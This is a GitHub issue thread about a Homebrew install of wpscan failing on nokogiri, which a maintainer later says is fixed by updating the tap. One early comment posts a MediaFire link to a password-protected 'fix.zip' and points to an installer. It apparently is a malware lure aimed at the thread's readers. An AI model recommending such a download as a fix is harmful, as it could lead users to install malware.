### ISSUE TITLE
brew wpscan error

### ISSUE THREAD

**Issue by sysjerm** [wpscanteam/homebrew-tap#10] opened 2024-08-28 14:18 UTC
**Before reading into details, I have tried using gem to install wpscan also - but I've installed all these requirements it needs, such as cms_scanner and nokogiri, however, even after installing these there is conflicts and wpscan still can't install, and prior, I had it installed and was using it and it worked perfectly fine.**

`MacBook Pro
14-inch, Nov 2023
Chip Apple M3
Memory 16 GB
macOS Sonoma 14.5`

[~]$ brew install wpscanteam/tap/wpscan
==> Auto-updating Homebrew...
Adjust how often this is run with HOMEBREW_AUTO_UPDATE_SECS or disable with
HOMEBREW_NO_AUTO_UPDATE. Hide these hints with HOMEBREW_NO_ENV_HINTS (see `man brew`).
==> Auto-updated Homebrew!
Updated 1 tap (homebrew/cask).
==> New Casks
font-server-mono                                                           microsoft-openjdk@21

You have 7 outdated formulae installed.

==> Fetching wpscanteam/tap/wpscan
==> Downloading https://github.com/wpscanteam/wpscan/archive/v3.8.25.tar.gz
Already downloaded: /Users/jrr/Library/Caches/Homebrew/downloads/1b7920cbfbe86f42424d8177387b32611ab3f91f3dc3bb0b29a226aa69239a9c--wpscan-3.8.25.tar.gz
==> Installing wpscan from wpscanteam/tap
==> gem install bundler
==> /opt/homebrew/Cellar/wpscan/3.8.25/libexec/gems/bundler-2.5.18/exe/bundle install --jobs=8
Last 15 lines from /Users/jrr/Library/Logs/Homebrew/wpscan/02.bundle:
/opt/homebrew/Cellar/wpscan/3.8.25/libexec/gems/bundler-2.5.18/lib/bundler/worker.rb:57:in
`block in process_queue'
  <internal:kernel>:187:in `loop'
/opt/homebrew/Cellar/wpscan/3.8.25/libexec/gems/bundler-2.5.18/lib/bundler/worker.rb:54:in
`process_queue'
/opt/homebrew/Cellar/wpscan/3.8.25/libexec/gems/bundler-2.5.18/lib/bundler/worker.rb:90:in
`block (2 levels) in create_threads'

An error occurred while installing nokogiri (1.15.6), and Bundler cannot
continue.

In Gemfile:
  wpscan was resolved to 3.8.25, which depends on
    cms_scanner was resolved to 0.13.9, which depends on
      nokogiri

If reporting this issue please do so at (not Homebrew/brew or Homebrew/homebrew-core):
  https://github.com/wpscanteam/homebrew-tap/issues

**Comment by scheichreisuli** [comment] 2024-08-28 14:19
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CarlesLlobet** [comment] 2024-08-29 20:36
+1 same here, before had no issues but now I get same error. 

Tried to install nokogiri manually, which was successful, but bundler still tries to install nokogiri (1.15.6) and breaks.

**Comment by sysjerm** [comment] 2024-08-30 13:28
bump

**Comment by alvsconcelos** [comment] 2024-09-03 13:05
Same here

**Comment by sysjerm** [comment] 2024-09-03 18:01
Simple fix: uninstall ohmyzsh if you have it and then install it and all problems should be good because I was gonna uninstall omz because I got tired of it but long story short. I’m using omz on one box and now I use fish which is pretty need shell fish shellfishshell.comHope this helps!On Sep 3, 2024, at 8:06 AM, Alvaro Vasconcelos ***@***.***> wrote:﻿
Same here

**Comment by tyrann0us** [comment] 2024-09-05 05:47
Duplicate of #8; @sysjerm, could you please close it? Thanks!

**Comment by erwanlr** [comment] 2024-09-05 16:35
Should be fixed now, please update the tap with `brew update` and then upgrade with `brew upgrade wpscan`

**Closed as completed by erwanlr** 2024-09-05 16:35 UTC
